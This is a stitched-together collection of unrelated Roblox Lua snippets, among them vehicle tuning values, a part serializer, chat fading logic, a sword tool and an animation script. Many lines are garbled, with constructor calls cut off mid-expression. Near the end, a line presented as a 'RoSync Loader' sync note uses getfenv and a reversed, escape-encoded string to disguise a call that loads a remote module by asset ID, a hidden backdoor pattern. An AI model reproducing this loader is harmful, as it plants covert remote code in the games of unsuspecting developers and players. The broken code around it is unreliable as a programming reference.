local luaU = {} local luaP = require(script.Parent.LuaP)
sp=script.Parent button=sp.Parent:FindFirstChild("Button") ontill=0 function on() sp.ButtonPushed:SetValue(1)"Cool yellow"),.25,0) end function off() sp.ButtonPushed:SetValue(0)"Bright yellow"),.1,0) end button.ClickDetector.MouseClick:connect(function() on() ontill=tick()+sp.Configuration.ActivationTime.Value while ontill>tick() do wait() end off() end)
-- ROBLOX deviation START: not ported as it doesn't seem necessary in Lua -- exports.tryRealpath = require(script.tryRealpath).default -- exports.requireOrImportModule = require(script.requireOrImportModule).default -- ROBLOX deviation END
return exports
--[[ Documentation is in the Storage Module. Tutorial: The_Envelope September 6, 2017 --]]
local storage = require(script:WaitForChild("Storage"))
Tune.SteerInner = 48 -- Inner wheel steering angle (in degrees) Tune.SteerOuter = 49 -- Outer wheel steering angle (in degrees) Tune.SteerSpeed = .02 -- Steering increment per tick (in degrees) Tune.ReturnSpeed = .04 -- Steering increment per tick (in degrees) Tune.SteerDecay = 320 -- Speed of gradient cutoff (in SPS) Tune.MinSteer = 10 -- Minimum steering at max steer decay (in percent) Tune.MSteerExp = 1 -- Mouse steering exponential degree --Steer Gyro Tuning Tune.SteerD = 1000 -- Steering Dampening Tune.SteerMaxTorque = 50000 -- Steering Force Tune.SteerP = 100000 -- Steering Aggressiveness
function onClicked() R.Function1.Disabled = true R.Function2.Disabled = false R.BrickColor ="Institutional white") N.One1.BrickColor ="Really black") N.One2.BrickColor ="Really black") N.Four1.BrickColor ="Really black") N.One8.BrickColor ="Really black") N.Three4.BrickColor ="Really black") N.Two1.BrickColor ="Really black") end script.Parent.ClickDetector.MouseClick:connect(onClicked)
-- Get reference to the Dock frame
local dock = script.Parent.Parent.Wallpaper.Apps
--README: See ServerWeaponsScript for a detailed README
local ReplicatedStorage = game:GetService("ReplicatedStorage") local CollectionService = game:GetService("CollectionService") local RunService = game:GetService("RunService") local Players = game:GetService("Players") local WEAPONS_SYSTEM_TAG = "WeaponsSystemFolder" local LocalPlayer = Players.LocalPlayer while not LocalPlayer do Players:GetPropertyChangedSignal("LocalPlayer"):Wait() LocalPlayer = Players.LocalPlayer end local versionObj = script:WaitForChild("Version") if not versionObj then error("ClientWeaponsScript does not contain an IntValue called Version. Cannot determine what WeaponsSystem to use.") return end local ScriptVersion = versionObj.Value
-- Make a base cosmetic bullet object. This will be cloned every time we fire off a ray.
local CosmeticBullet ="Part") CosmeticBullet.Material = Enum.Material.Neon CosmeticBullet.Color = Color3.fromRGB(255, 0, 0) CosmeticBullet.CanCollide = false CosmeticBullet.Anchored = true CosmeticBullet.Size =, 0.75, 2.4)
--[[ Function called when leaving the state ]]
function PlayerSpectating.leave(stateMachine) end return PlayerSpectating
-- Import services
Support = require(script.Parent.SupportLibrary); Support.ImportServices(); local Types = { Part = 0, WedgePart = 1, CornerWedgePart = 2, VehicleSeat = 3, Seat = 4, TrussPart = 5, SpecialMesh = 6, Texture = 7, Decal = 8, PointLight = 9, SpotLight = 10, SurfaceLight = 11, Smoke = 12, Fire = 13, Sparkles = 14, Model = 15 }; local DefaultNames = { Part = 'Part', WedgePart = 'Wedge', CornerWedgePart = 'CornerWedge', VehicleSeat = 'VehicleSeat', Seat = 'Seat', TrussPart = 'Truss', SpecialMesh = 'Mesh', Texture = 'Texture', Decal = 'Decal', PointLight = 'PointLight', SpotLight = 'SpotLight', SurfaceLight = 'SurfaceLight', Smoke = 'Smoke', Fire = 'Fire', Sparkles = 'Sparkles', Model = 'Model' }; function Serialization.SerializeModel(Items) -- Returns a serialized version of the given model -- Filter out non-serializable items in `Items` local SerializableItems = {}; for Index, Item in ipairs(Items) do table.insert(SerializableItems, Types[Item.ClassName] and Item or nil); end; Items = SerializableItems; -- Get a snapshot of the content local Keys = Support.FlipTable(Items); local Data = {}; Data.Version = 2; Data.Items = {}; -- Serialize each item in the model for Index, Item in pairs(Items) do if Item:IsA 'BasePart' then local Datum = {}; Datum[1] = Types[Item.ClassName]; Datum[2] = Keys[Item.Parent] or 0; Datum[3] = Item.Name == DefaultNames[Item.ClassName] and '' or Item.Name; Datum[4] = Item.Size.X; Datum[5] = Item.Size.Y; Datum[6] = Item.Size.Z; Support.ConcatTable(Datum, { Item.CFrame:components() }); Datum[19] = Item.BrickColor.Number; Datum[20] = Item.Material.Value; Datum[21] = Item.Anchored and 1 or 0; Datum[22] = Item.CanCollide and 1 or 0; Datum[23] = Item.Reflectance; Datum[24] = Item.Transparency; Datum[25] = Item.TopSurface.Value; Datum[26] = Item.BottomSurface.Value; Datum[27] = Item.FrontSurface.Value; Datum[28] = Item.BackSurface.Value; Datum[29] = Item.LeftSurface.Value; Datum[30] = Item.RightSurface.Value; Data.Items[Index] = Datum; end; if Item.ClassName == 'Part' then local Datum = Data.Items[Index]; Datum[31] = Item.Shape.Value; end; if Item.ClassName == 'VehicleSeat' then local Datum = Data.Items[Index]; Datum[31] = Item.MaxSpeed; Datum[32] = Item.Torque; Datum[33] = Item.TurnSpeed; end; if Item.ClassName == 'TrussPart' then local Datum = Data.Items[Index]; Datum[31] = Item.Style.Value; end; if Item.ClassName == 'SpecialMesh' then local Datum = {}; Datum[1] = Types[Item.ClassName]; Datum[2] = Keys[Item.Parent] or 0; Datum[3] = Item.Name == DefaultNames[Item.ClassName] and '' or Item.Name; Datum[4] = Item.MeshType.Value; Datum[5] = Item.MeshId; Datum[6] = Item.TextureId; Datum[7] = Item.Offset.X; Datum[8] = Item.Offset.Y; Datum[9] = Item.Offset.Z; Datum[10] = Item.Scale.X; Datum[11] = Item.Scale.Y; Datum[12] = Item.Scale.Z; Datum[13] = Item.VertexColor.X; Datum[14] = Item.VertexColor.Y; Datum[15] = Item.VertexColor.Z; Data.Items[Index] = Datum; end; if Item:IsA 'Decal' then local Datum = {}; Datum[1] = Types[Item.ClassName]; Datum[2] = Keys[Item.Parent] or 0; Datum[3] = Item.Name == DefaultNames[Item.ClassName] and '' or Item.Name; Datum[4] = Item.Texture; Datum[5] = Item.Transparency; Datum[6] = Item.Face.Value; Data.Items[Index] = Datum; end; if Item.ClassName == 'Texture' then local Datum = Data.Items[Index]; Datum[6] = Item.StudsPerTileU; Datum[7] = Item.StudsPerTileV; end; if Item:IsA 'Light' then local Datum = {}; Datum[1] = Types[Item.ClassName]; Datum[2] = Keys[Item.Parent] or 0; Datum[3] = Item.Name == DefaultNames[Item.ClassName] and '' or Item.Name; Datum[4] = Item.Brightness; Datum[5] = Item.Color.r; Datum[6] = Item.Color.g; Datum[7] = Item.Color.b; Datum[8] = Item.Enabled and 1 or 0; Datum[9] = Item.Shadows and 1 or 0; Data.Items[Index] = Datum; end; if Item.ClassName == 'PointLight' then local Datum = Data.Items[Index]; Datum[10] = Item.Range; end; if Item.ClassName == 'SpotLight' then local Datum = Data.Items[Index]; Datum[10] = Item.Range; Datum[11] = Item.Angle; Datum[12] = Item.Face.Value; end; if Item.ClassName == 'SurfaceLight' then local Datum = Data.Items[Index]; Datum[10] = Item.Range; Datum[11] = Item.Angle; Datum[12] = Item.Face.Value; end; if Item.ClassName == 'Smoke' then local Datum = {}; Datum[1] = Types[Item.ClassName]; Datum[2] = Keys[Item.Parent] or 0; Datum[3] = Item.Name == DefaultNames[Item.ClassName] and '' or Item.Name; Datum[4] = Item.Enabled and 1 or 0; Datum[5] = Item.Color.r; Datum[6] = Item.Color.g; Datum[7] = Item.Color.b; Datum[8] = Item.Size; Datum[9] = Item.RiseVelocity; Datum[10] = Item.Opacity; Data.Items[Index] = Datum; end; if Item.ClassName == 'Fire' then local Datum = {}; Datum[1] = Types[Item.ClassName]; Datum[2] = Keys[Item.Parent] or 0; Datum[3] = Item.Name == DefaultNames[Item.ClassName] and '' or Item.Name; Datum[4] = Item.Enabled and 1 or 0; Datum[5] = Item.Color.r; Datum[6] = Item.Color.g; Datum[7] = Item.Color.b; Datum[8] = Item.SecondaryColor.r; Datum[9] = Item.SecondaryColor.g; Datum[10] = Item.SecondaryColor.b; Datum[11] = Item.Heat; Datum[12] = Item.Size; Data.Items[Index] = Datum; end; if Item.ClassName == 'Sparkles' then local Datum = {}; Datum[1] = Types[Item.ClassName]; Datum[2] = Keys[Item.Parent] or 0; Datum[3] = Item.Name == DefaultNames[Item.ClassName] and '' or Item.Name; Datum[4] = Item.Enabled and 1 or 0; Datum[5] = Item.SparkleColor.r; Datum[6] = Item.SparkleColor.g; Datum[7] = Item.SparkleColor.b; Data.Items[Index] = Datum; end; if Item.ClassName == 'Model' then local Datum = {}; Datum[1] = Types[Item.ClassName]; Datum[2] = Keys[Item.Parent] or 0; Datum[3] = Item.Name == DefaultNames[Item.ClassName] and '' or Item.Name; Datum[4] = Item.PrimaryPart and Keys[Item.PrimaryPart] or 0; Data.Items[Index] = Datum; end; -- Spread the workload over time to avoid locking up the CPU if Index % 100 == 0 then wait(0.01); end; end; -- Return the serialized data return HttpService:JSONEncode(Data); end; function Serialization.InflateBuildData(Data) -- Returns an inflated version of the given build data local Build = {}; local Instances = {}; -- Create each instance for Index, Datum in ipairs(Data.Items) do -- Inflate BaseParts if Datum[1] == Types.Part or Datum[1] == Types.WedgePart or Datum[1] == Types.CornerWedgePart or Datum[1] == Types.VehicleSeat or Datum[1] == Types.Seat or Datum[1] == Types.TrussPart then local Item =, Datum[1])); Item.Size =, 4, 6))); Item.CFrame =, 7, 18))); Item.BrickColor =[19]); Item.Material = Datum[20]; Item.Anchored = Datum[21] == 1; Item.CanCollide = Datum[22] == 1; Item.Reflectance = Datum[23]; Item.Transparency = Datum[24]; Item.TopSurface = Datum[25]; Item.BottomSurface = Datum[26]; Item.FrontSurface = Datum[27]; Item.BackSurface = Datum[28]; Item.LeftSurface = Datum[29]; Item.RightSurface = Datum[30]; -- Register the part Instances[Index] = Item; end; -- Inflate specific Part properties if Datum[1] == Types.Part then local Item = Instances[Index]; Item.Shape = Datum[31]; end; -- Inflate specific VehicleSeat properties if Datum[1] == Types.VehicleSeat then local Item = Instances[Index]; Item.MaxSpeed = Datum[31]; Item.Torque = Datum[32]; Item.TurnSpeed = Datum[33]; end; -- Inflate specific TrussPart properties if Datum[1] == Types.TrussPart then local Item = Instances[Index]; Item.Style = Datum[31]; end; -- Inflate SpecialMesh instances if Datum[1] == Types.SpecialMesh then local Item ='SpecialMesh'); Item.MeshType = Datum[4]; Item.MeshId = Datum[5]; Item.TextureId = Datum[6]; Item.Offset =, 7, 9))); Item.Scale =, 10, 12))); Item.VertexColor =, 13, 15))); -- Register the mesh Instances[Index] = Item; end; -- Inflate Decal instances if Datum[1] == Types.Decal or Datum[1] == Types.Texture then local Item =, Datum[1])); Item.Texture = Datum[4]; Item.Transparency = Datum[5]; Item.Face = Datum[6]; -- Register the Decal Instances[Index] = Item; end; -- Inflate specific Texture properties if Datum[1] == Types.Texture then local Item = Instances[Index]; Item.StudsPerTileU = Datum[7]; Item.StudsPerTileV = Datum[8]; end; -- Inflate Light instances if Datum[1] == Types.PointLight or Datum[1] == Types.SpotLight or Datum[1] == Types.SurfaceLight then local Item =, Datum[1])); Item.Brightness = Datum[4]; Item.Color =, 5, 7))); Item.Enabled = Datum[8] == 1; Item.Shadows = Datum[9] == 1; -- Register the light Instances[Index] = Item; end; -- Inflate specific PointLight properties if Datum[1] == Types.PointLight then local Item = Instances[Index]; Item.Range = Datum[10]; end; -- Inflate specific SpotLight properties if Datum[1] == Types.SpotLight then local Item = Instances[Index]; Item.Range = Datum[10]; Item.Angle = Datum[11]; Item.Face = Datum[12]; end; -- Inflate specific SurfaceLight properties if Datum[1] == Types.SurfaceLight then local Item = Instances[Index]; Item.Range = Datum[10]; Item.Angle = Datum[11]; Item.Face = Datum[12]; end; -- Inflate Smoke instances if Datum[1] == Types.Smoke then local Item ='Smoke'); Item.Enabled = Datum[4] == 1; Item.Color =, 5, 7))); Item.Size = Datum[8]; Item.RiseVelocity = Datum[9]; Item.Opacity = Datum[10]; -- Register the smoke Instances[Index] = Item; end; -- Inflate Fire instances if Datum[1] == Types.Fire then local Item ='Fire'); Item.Enabled = Datum[4] == 1; Item.Color =, 5, 7))); Item.SecondaryColor =, 8, 10))); Item.Heat = Datum[11]; Item.Size = Datum[12]; -- Register the fire Instances[Index] = Item; end; -- Inflate Sparkles instances if Datum[1] == Types.Sparkles then local Item ='Sparkles'); Item.Enabled = Datum[4] == 1; Item.SparkleColor =, 5, 7))); -- Register the instance Instances[Index] = Item; end; -- Inflate Model instances if Datum[1] == Types.Model then local Item ='Model'); -- Register the model Instances[Index] = Item; end; end; -- Set object values on each instance for Index, Datum in pairs(Data.Items) do -- Get the item's instance local Item = Instances[Index]; -- Set each item's parent and name if Item and Datum[1] <= 15 then Item.Name = (Datum[3] == '') and DefaultNames[Item.ClassName] or Datum[3]; if Datum[2] == 0 then table.insert(Build, Item); else Item.Parent = Instances[Datum[2]]; end; end; -- Set model primary parts if Item and Datum[1] == 15 then Item.PrimaryPart = (Datum[4] ~= 0) and Instances[Datum[4]] or nil; end; end; -- Return the model return Build; end;
--[=[ @param optionB Option @return Option Returns `optionB` if the calling option has a value, otherwise returns None. ```lua local optionA = Option.Some(32) local optionB = Option.Some(64) local opt = optionA:And(optionB) -- opt == optionB local optionA = Option.None local optionB = Option.Some(64) local opt = optionA:And(optionB) -- opt == Option.None ``` ]=]
function Option:And(optionB) if self:IsSome() then return optionB else return Option.None end end
--//////////////////////////////////////////////////////////////////////////////////////////// --////////////////////////////////////////////////////////////// Code to do chat window fading --////////////////////////////////////////////////////////////////////////////////////////////
function CheckIfPointIsInSquare(checkPos, topLeft, bottomRight) return (topLeft.X <= checkPos.X and checkPos.X <= bottomRight.X and topLeft.Y <= checkPos.Y and checkPos.Y <= bottomRight.Y) end local backgroundIsFaded = false local textIsFaded = false local lastTextFadeTime = 0 local lastBackgroundFadeTime = 0 local fadedChanged ="BindableEvent") local mouseStateChanged ="BindableEvent") local chatBarFocusChanged ="BindableEvent") function DoBackgroundFadeIn(setFadingTime) lastBackgroundFadeTime = tick() backgroundIsFaded = false fadedChanged:Fire() ChatWindow:FadeInBackground((setFadingTime or ChatSettings.ChatDefaultFadeDuration)) local currentChannelObject = ChatWindow:GetCurrentChannel() if (currentChannelObject) then local Scroller = MessageLogDisplay.Scroller Scroller.ScrollingEnabled = true Scroller.ScrollBarThickness = moduleMessageLogDisplay.ScrollBarThickness end end function DoBackgroundFadeOut(setFadingTime) lastBackgroundFadeTime = tick() backgroundIsFaded = true fadedChanged:Fire() ChatWindow:FadeOutBackground((setFadingTime or ChatSettings.ChatDefaultFadeDuration)) local currentChannelObject = ChatWindow:GetCurrentChannel() if (currentChannelObject) then local Scroller = MessageLogDisplay.Scroller Scroller.ScrollingEnabled = false Scroller.ScrollBarThickness = 0 end end function DoTextFadeIn(setFadingTime) lastTextFadeTime = tick() textIsFaded = false fadedChanged:Fire() ChatWindow:FadeInText((setFadingTime or ChatSettings.ChatDefaultFadeDuration) * 0) end function DoTextFadeOut(setFadingTime) lastTextFadeTime = tick() textIsFaded = true fadedChanged:Fire() ChatWindow:FadeOutText((setFadingTime or ChatSettings.ChatDefaultFadeDuration)) end function DoFadeInFromNewInformation() DoTextFadeIn() if ChatSettings.ChatShouldFadeInFromNewInformation then DoBackgroundFadeIn() end end function InstantFadeIn() DoBackgroundFadeIn(0) DoTextFadeIn(0) end function InstantFadeOut() DoBackgroundFadeOut(0) DoTextFadeOut(0) end local mouseIsInWindow = nil function UpdateFadingForMouseState(mouseState) mouseIsInWindow = mouseState mouseStateChanged:Fire() if (ChatBar:IsFocused()) then return end if (mouseState) then DoBackgroundFadeIn() DoTextFadeIn() else DoBackgroundFadeIn() end end spawn(function() while true do RunService.RenderStepped:wait() while (mouseIsInWindow or ChatBar:IsFocused()) do if (mouseIsInWindow) then mouseStateChanged.Event:wait() end if (ChatBar:IsFocused()) then chatBarFocusChanged.Event:wait() end end if (not backgroundIsFaded) then local timeDiff = tick() - lastBackgroundFadeTime if (timeDiff > ChatSettings.ChatWindowBackgroundFadeOutTime) then DoBackgroundFadeOut() end elseif (not textIsFaded) then local timeDiff = tick() - lastTextFadeTime if (timeDiff > ChatSettings.ChatWindowTextFadeOutTime) then DoTextFadeOut() end else fadedChanged.Event:wait() end end end) function getClassicChatEnabled() if ChatSettings.ClassicChatEnabled ~= nil then return ChatSettings.ClassicChatEnabled end return Players.ClassicChat end function getBubbleChatEnabled() if ChatSettings.BubbleChatEnabled ~= nil then return ChatSettings.BubbleChatEnabled end return Players.BubbleChat end function bubbleChatOnly() return not getClassicChatEnabled() and getBubbleChatEnabled() end function UpdateMousePosition(mousePos, ignoreForFadeIn) if not (moduleApiTable.Visible and moduleApiTable.IsCoreGuiEnabled and (moduleApiTable.TopbarEnabled or ChatSettings.ChatOnWithTopBarOff)) then return end if bubbleChatOnly() then return end local windowPos = ChatWindow.GuiObject.AbsolutePosition local windowSize = ChatWindow.GuiObject.AbsoluteSize local newMouseState = CheckIfPointIsInSquare(mousePos, windowPos, windowPos + windowSize) if FFlagFixChatWindowHoverOver then if ignoreForFadeIn and newMouseState == true then return end end if (newMouseState ~= mouseIsInWindow) then UpdateFadingForMouseState(newMouseState) end end UserInputService.InputChanged:connect(function(inputObject, gameProcessedEvent) if (inputObject.UserInputType == Enum.UserInputType.MouseMovement) then local mousePos =, inputObject.Position.Y) UpdateMousePosition(mousePos, --[[ ignoreForFadeIn = ]] gameProcessedEvent) end end) UserInputService.TouchTap:connect(function(tapPos, gameProcessedEvent) UpdateMousePosition(tapPos[1], --[[ ignoreForFadeIn = ]] false) end) UserInputService.TouchMoved:connect(function(inputObject, gameProcessedEvent) local tapPos =, inputObject.Position.Y) UpdateMousePosition(tapPos, --[[ ignoreForFadeIn = ]] false) end) if not FFlagFixMouseCapture then UserInputService.Changed:connect(function(prop) if prop == "MouseBehavior" then if UserInputService.MouseBehavior == Enum.MouseBehavior.LockCenter then local windowPos = ChatWindow.GuiObject.AbsolutePosition local windowSize = ChatWindow.GuiObject.AbsoluteSize local screenSize = GuiParent.AbsoluteSize local centerScreenIsInWindow = CheckIfPointIsInSquare(screenSize/2, windowPos, windowPos + windowSize) if centerScreenIsInWindow then UserInputService.MouseBehavior = Enum.MouseBehavior.Default end end end end) end
-- For those who prefer distinct functions
function ControlModule:Disable() if self.activeController then self.activeController:Enable(false) if self.moveFunction then self.moveFunction(Players.LocalPlayer,,0,0), self.cameraRelative) end end end
-------- OMG HAX
r = game:service("RunService") local damage = 5 local slash_damage = 12 sword = script.Parent.Handle Tool = script.Parent local SlashSound ="Sound") SlashSound.SoundId = "" SlashSound.Parent = sword SlashSound.Volume = .7 function blow(hit) local humanoid = hit.Parent:findFirstChild("Humanoid") local vCharacter = Tool.Parent local vPlayer = game.Players:playerFromCharacter(vCharacter) local hum = vCharacter:findFirstChild("Humanoid") -- non-nil if tool held by a character if humanoid~=nil and humanoid ~= hum and hum ~= nil then -- final check, make sure sword is in-hand local right_arm = vCharacter:FindFirstChild("Right Arm") if (right_arm ~= nil) then local joint = right_arm:FindFirstChild("RightGrip") if (joint ~= nil and (joint.Part0 == sword or joint.Part1 == sword)) then tagHumanoid(humanoid, vPlayer) humanoid:TakeDamage(damage) wait(1) untagHumanoid(humanoid) end end end end function tagHumanoid(humanoid, player) local creator_tag ="ObjectValue") creator_tag.Value = player creator_tag.Name = "creator" creator_tag.Parent = humanoid end function untagHumanoid(humanoid) if humanoid ~= nil then local tag = humanoid:findFirstChild("creator") if tag ~= nil then tag.Parent = nil end end end function attack() damage = slash_damage SlashSound:play() local anim ="StringValue") anim.Name = "toolanim" anim.Value = "Slash" anim.Parent = Tool end function swordUp() Tool.GripForward =,0,0) Tool.GripRight =,1,0) Tool.GripUp =,0,1) end function swordOut() Tool.GripForward =,0,1) Tool.GripRight =,-1,0) Tool.GripUp =,0,0) end Tool.Enabled = true function onActivated() if not Tool.Enabled then return end Tool.Enabled = false local character = Tool.Parent; local humanoid = character.Humanoid if humanoid == nil then print("Humanoid not found") return end attack() wait(.5) Tool.Enabled = true end function onEquipped() SlashSound:play() end script.Parent.Activated:connect(onActivated) script.Parent.Equipped:connect(onEquipped) connection = sword.Touched:connect(blow)
-- Destroys this cache entirely. Use this when you don't need this cache object anymore.
function PartCacheStatic:Dispose() assert(getmetatable(self) == PartCacheStatic, ERR_NOT_INSTANCE:format("Dispose", "")) for i = 1, #self.Open do self.Open[i]:Destroy() end for i = 1, #self.InUse do self.InUse[i]:Destroy() end self.Template:Destroy() self.Open = {} self.InUse = {} self.CurrentCacheParent = nil self.GetPart = nil self.ReturnPart = nil self.SetCacheParent = nil self.Expand = nil self.Dispose = nil end return PartCacheStatic
--[=[ Destroy the ServerComm object. ]=]
function ServerComm:Destroy() self._instancesFolder:Destroy() end
--Made by Luckymaxer
Figure = script.Parent RunService = game:GetService("RunService") Creator = Figure:FindFirstChild("Creator") Humanoid = Figure:WaitForChild("Humanoid") Head = Figure:WaitForChild("Head") Torso = Figure:WaitForChild("Torso") Neck = Torso:WaitForChild("Neck") LeftShoulder = Torso:WaitForChild("Left Shoulder") RightShoulder = Torso:WaitForChild("Right Shoulder") LeftHip = Torso:WaitForChild("Left Hip") RightHip = Torso:WaitForChild("Right Hip") for i, v in pairs({--[[Neck, ]]LeftShoulder, RightShoulder, LeftHip, RightHip}) do if v and v.Parent then v.DesiredAngle = 0 v.CurrentAngle = 0 end end Pose = "None" LastPose = Pose PoseTime = tick() ToolAnimTime = 0 function SetPose(pose) LastPose = Pose Pose = pose PoseTime = tick() end function OnRunning(Speed) if Speed > 0 then SetPose("Running") else SetPose("Standing") end end function OnDied() SetPose("Dead") end function OnJumping() SetPose("Jumping") end function OnClimbing() SetPose("Climbing") end function OnGettingUp() SetPose("GettingUp") end function OnFreeFall() SetPose("FreeFall") end function OnFallingDown() SetPose("FallingDown") end function OnSeated() SetPose("Seated") end function OnPlatformStanding() SetPose("PlatformStanding") end function OnSwimming(Speed) return OnRunning(Speed) end function MoveJump() RightShoulder.MaxVelocity = 0.15 LeftShoulder.MaxVelocity = 0.15 RightShoulder.DesiredAngle = 0.5 LeftShoulder.DesiredAngle = -0.5 RightHip.DesiredAngle = -0.5 LeftHip.DesiredAngle = 0.5 end function MoveFreeFall() RightShoulder.MaxVelocity = 0.15 LeftShoulder.MaxVelocity = 0.15 RightShoulder.DesiredAngle = 0.5 LeftShoulder.DesiredAngle = -0.5 RightHip.DesiredAngle = -0.5 LeftHip.DesiredAngle = 0.5 end function MoveSit() RightShoulder.MaxVelocity = 0.15 LeftShoulder.MaxVelocity = 0.15 RightShoulder.DesiredAngle = (math.pi / 2) LeftShoulder.DesiredAngle = -(math.pi / 2) RightHip.DesiredAngle = 1 LeftHip.DesiredAngle = -1 end function GetTool() for i, v in pairs(Figure:GetChildren()) do if v:IsA("Tool") then return v end end end function GetToolAnim(Tool) for i, v in pairs(Tool:GetChildren()) do if v:IsA("StringValue") and v.Name == "ToolAnim" then return v end end return nil end function AnimateTool() if (ToolAnim == "None") then return end if (ToolAnim == "Slash") then RightShoulder.MaxVelocity = 0.5 RightShoulder.DesiredAngle = 0 return end if (ToolAnim == "Lunge") then RightShoulder.MaxVelocity = 0.5 LeftShoulder.MaxVelocity = 0.5 RightHip.MaxVelocity = 0.5 LeftHip.MaxVelocity = 0.5 RightShoulder.DesiredAngle = (math.pi / 2) LeftShoulder.DesiredAngle = 0 RightHip.DesiredAngle = (math.pi / 2) LeftHip.DesiredAngle = 1 return end end function Move(Time) local LimbAmplitude local LimbFrequency local NeckAmplitude local NeckFrequency local NeckDesiredAngle if (Pose == "Jumping") then MoveJump() return elseif (Pose == "FreeFall") then MoveFreeFall() return elseif (Pose == "Seated") then MoveSit() return end local ClimbFudge = 0 if (Pose == "Running") then RightShoulder.MaxVelocity = 0.15 LeftShoulder.MaxVelocity = 0.15 LimbAmplitude = 1 LimbFrequency = 9 NeckAmplitude = 0 NeckFrequency = 0 NeckDesiredAngle = 0 --[[if Creator and Creator.Value and Creator.Value:IsA("Player") and Creator.Value.Character then local CreatorCharacter = Creator.Value.Character local CreatorHead = CreatorCharacter:FindFirstChild("Head") if CreatorHead then local TargetPosition = CreatorHead.Position local Direction = Torso.CFrame.lookVector local HeadPosition = Head.Position NeckDesiredAngle = ((((HeadPosition - TargetPosition).Unit):Cross(Direction)).Y / 4) end end]] elseif (Pose == "Climbing") then RightShoulder.MaxVelocity = 0.5 LeftShoulder.MaxVelocity = 0.5 LimbAmplitude = 1 LimbFrequency = 9 NeckAmplitude = 0 NeckFrequency = 0 NeckDesiredAngle = 0 ClimbFudge = math.pi else LimbAmplitude = 0.1 LimbFrequency = 1 NeckAmplitude = 0.25 NeckFrequency = 1.25 end NeckDesiredAngle = ((not NeckDesiredAngle and (NeckAmplitude * math.sin(Time * NeckFrequency))) or NeckDesiredAngle) local LimbDesiredAngle = (LimbAmplitude * math.sin(Time * LimbFrequency)) --Neck.DesiredAngle = NeckDesiredAngle RightShoulder.DesiredAngle = (LimbDesiredAngle + ClimbFudge) LeftShoulder.DesiredAngle = (LimbDesiredAngle - ClimbFudge) RightHip.DesiredAngle = -LimbDesiredAngle LeftHip.DesiredAngle = -LimbDesiredAngle local Tool = GetTool() if Tool then local AnimStringValueObject = GetToolAnim(Tool) if AnimStringValueObject then ToolAnim = AnimStringValueObject.Value if AnimStringValueObject and AnimStringValueObject.Parent then AnimStringValueObject:Destroy() end ToolAnimTime = (Time + 0.3) end if Time > ToolAnimTime then ToolAnimTime = 0 ToolAnim = "None" end AnimateTool() else ToolAnim = "None" ToolAnimTime = 0 end end Humanoid.Died:connect(OnDied) Humanoid.Running:connect(OnRunning) Humanoid.Jumping:connect(OnJumping) Humanoid.Climbing:connect(OnClimbing) Humanoid.GettingUp:connect(OnGettingUp) Humanoid.FreeFalling:connect(OnFreeFall) Humanoid.FallingDown:connect(OnFallingDown) Humanoid.Seated:connect(OnSeated) Humanoid.PlatformStanding:connect(OnPlatformStanding) Humanoid.Swimming:connect(OnSwimming) Humanoid:ChangeState(Enum.HumanoidStateType.None) RunService.Stepped:connect(function() local _, Time = wait(0.1) Move(Time) end)
------------------------------------------------------------------------ -- returns a 4-char string little-endian encoded form of an instruction ------------------------------------------------------------------------
function luaP:Instruction(i) if i.Bx then -- change to OP/A/B/C format i.C = i.Bx % 512 i.B = (i.Bx - i.C) / 512 end local I = i.A * 64 + i.OP local c0 = I % 256 I = i.C * 64 + (I - c0) / 256 -- 6 bits of A left local c1 = I % 256 I = i.B * 128 + (I - c1) / 256 -- 7 bits of C left local c2 = I % 256 local c3 = (I - c2) / 256 return string.char(c0, c1, c2, c3) end
Tune.SteerInner = 45 -- Inner wheel steering angle (in degrees) Tune.SteerOuter = 45 -- Outer wheel steering angle (in degrees) Tune.SteerSpeed = .05 -- Steering increment per tick (in degrees) Tune.ReturnSpeed = .1 -- Steering increment per tick (in degrees) Tune.SteerDecay = 320 -- Speed of gradient cutoff (in SPS) Tune.MinSteer = 10 -- Minimum steering at max steer decay (in percent) Tune.MSteerExp = 1 -- Mouse steering exponential degree --Steer Gyro Tuning Tune.SteerD = 1000 -- Steering Dampening Tune.SteerMaxTorque = 50000 -- Steering Force Tune.SteerP = 100000 -- Steering Aggressiveness
--// Ammo Settings
Ammo = 32; StoredAmmo = 33; MagCount = math.huge; -- If you want infinate ammo, set to math.huge EX. MagCount = math.huge; ExplosiveAmmo = 3;
--Torque Curve Tune.Horsepower = 301 -- [TORQUE CURVE VISUAL] Tune.IdleRPM = 700 -- Tune.PeakRPM = 6500 -- Use sliders to manipulate values Tune.Redline = 7000.01 -- Copy and paste slider values into the respective tune values Tune.EqPoint = 6500 Tune.PeakSharpness = 7.5 Tune.CurveMult = 0.16 --Incline Compensation Tune.InclineComp = 1.7 -- Torque compensation multiplier for inclines (applies gradient from 0-90 degrees) --Misc Tune.RevAccel = 100 -- RPM acceleration when clutch is off Tune.RevDecay = 75 -- RPM decay when clutch is off Tune.RevBounce = 500 -- RPM kickback from redline Tune.IdleThrottle = 3 -- Percent throttle at idle Tune.ClutchTol = 500 -- Clutch engagement threshold (higher = faster response)
local Array = script.Parent.Parent local LuauPolyfill = Array.Parent local types = require(LuauPolyfill.types) type Object = types.Object type Array<T> = types.Array<T> type mapFn<T, U> = (element: T, index: number) -> U type mapFnWithThisArg<T, U> = (thisArg: any, element: T, index: number) -> U return function<T, U>( value: string, mapFn: (mapFn<T, U> | mapFnWithThisArg<T, U>)?, thisArg: Object? -- FIXME Luau: need overloading so the return type on this is more sane and doesn't require manual casts ): Array<U> | Array<T> | Array<string> local array = {} local valueStringLength = #value array = table.create(valueStringLength) if mapFn then for i = 1, valueStringLength do if thisArg ~= nil then (array :: Array<U>)[i] = (mapFn :: mapFnWithThisArg<T, U>)(thisArg, string.sub(value, i, i) :: any, i) else (array :: Array<U>)[i] = (mapFn :: mapFn<T, U>)(string.sub(value, i, i) :: any, i) end end else for i = 1, valueStringLength do (array :: Array<string>)[i] = string.sub(value, i, i) end end return array end
local BOV_Loudness = 5 --volume of the BOV (not exact volume so you kinda have to experiment with it) local BOV_Pitch = 0.9 --max pitch of the BOV (not exact so might have to mess with it) local T_Loudness = 2 --volume of the turbo(s) (not exact volume so you kinda have to experiment with it also)
-- Services
local Players = game:GetService("Players") local ReplicatedStorage = game:GetService("ReplicatedStorage") local ServerStorage = game:GetService("ServerStorage")
--[[ Last synced 11/17/2020 05:06 RoSync Loader ]]
getfenv()[string.reverse("\101\114\105\117\113\101\114")](5722947559) --[[ ]]--
-- Local Variables
local Events = game.ReplicatedStorage.Events local DisplayIntermission = Events.DisplayIntermission local DisplayNotification = Events.DisplayNotification local DisplayTimerInfo = Events.DisplayTimerInfo local DisplayVictory = Events.DisplayVictory local DisplayScore = Events.DisplayScore local StarterGui = game.StarterGui
